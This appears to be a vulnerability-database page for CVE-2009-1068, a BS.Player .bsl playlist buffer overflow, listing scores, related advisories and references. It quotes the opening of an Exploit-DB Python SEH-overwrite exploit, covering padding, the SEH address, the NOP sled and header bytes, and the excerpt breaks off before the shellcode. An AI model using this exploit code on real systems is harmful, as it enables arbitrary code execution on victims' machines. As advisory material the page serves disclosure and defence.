CVE-2009-1068
published 2009-03-26CVE-2009-1068: Stack-based buffer overflow in BS.Player (bsplayer) 2.32 Build 975 Free and 2.34 Build 980 PRO and earlier allows remote attackers to cause a denial of service…
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
14.97%
96.3th percentile
Stack-based buffer overflow in BS.Player (bsplayer) 2.32 Build 975 Free and 2.34 Build 980 PRO and earlier allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long hostname in a .bsl playlist file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bsplayer | bs.player | — | — |
| bsplayer | bs.player | — | — |
| bsplayer | bs.player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2cxm-7f99-2c44: Stack-based buffer overflow in BS
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2010-2004 [CRITICAL] CWE-119 GHSA-2cxm-7f99-2c44: Stack-based buffer overflow in BS
Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.
GHSA
GHSA-9747-xg65-c4f2: Stack-based buffer overflow in BS
ghsa_unreviewed·2022-05-02
CVE-2009-1068 [HIGH] CWE-119 GHSA-9747-xg65-c4f2: Stack-based buffer overflow in BS
Stack-based buffer overflow in BS.Player (bsplayer) 2.32 Build 975 Free and 2.34 Build 980 PRO and earlier allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long hostname in a .bsl playlist file.
No detection rules found.
Exploit-DB
BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)
exploitdb·2009-03-20
CVE-2009-1068 BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)
BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)
---
#usage: exploit.py
print "**************************************************************************"
print " Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\n"
print " Author : Nine:Situations:Group::pyrokinesis"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 412
next_seh = "\xEB\x12\x41\x41"
seh = "\xD0\x26\x58\x02" # oldskin.dll
nops = "\x90"*19
header1= "\x68\x74\x74\x70\x3A\x2F\x2F\x52\x61\x77\x2D\x48\x69\x67\x68\x2E"
header2= "\x2E\x46\x4D\x2F\x6C\x69\x73\x74\x65\x6E\x2E\x70\x6C\x73\x0A\x00"
# win32_exec - EXITFUNC=seh CMD=c
Exploit-DB
BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)
exploitdb·2009-03-20
CVE-2009-1068 BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)
BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)
---
# milw0rm.com [2009-03-20]
No writeups or analysis indexed.
http://osvdb.org/52841http://retrogod.altervista.org/9sg_bsplayer_seh.htmlhttp://secunia.com/advisories/34412http://www.securityfocus.com/archive/1/502016/100/0/threadedhttp://www.securityfocus.com/bid/34190http://www.vupen.com/english/advisories/2009/0800https://exchange.xforce.ibmcloud.com/vulnerabilities/49342https://www.exploit-db.com/exploits/8249https://www.exploit-db.com/exploits/8251http://osvdb.org/52841http://retrogod.altervista.org/9sg_bsplayer_seh.htmlhttp://secunia.com/advisories/34412http://www.securityfocus.com/archive/1/502016/100/0/threadedhttp://www.securityfocus.com/bid/34190http://www.vupen.com/english/advisories/2009/0800https://exchange.xforce.ibmcloud.com/vulnerabilities/49342https://www.exploit-db.com/exploits/8249https://www.exploit-db.com/exploits/8251
2009-03-26
Published